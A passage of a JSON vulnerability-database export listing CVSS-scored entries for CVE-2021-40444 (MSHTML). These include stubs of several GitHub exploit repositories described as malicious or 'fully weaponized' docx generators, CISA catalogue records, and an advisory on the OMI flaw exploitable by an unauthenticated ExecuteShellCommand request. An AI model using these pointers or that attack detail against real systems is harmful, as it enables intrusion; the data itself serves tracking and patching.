["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Common Log File System (CLFS) driver contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-36955", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Open Management Infrastructure (OMI) within Azure VM Management Extensions contains an unspecified vulnerability allowing remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-38647", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2021-11-26T18:36:50", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], 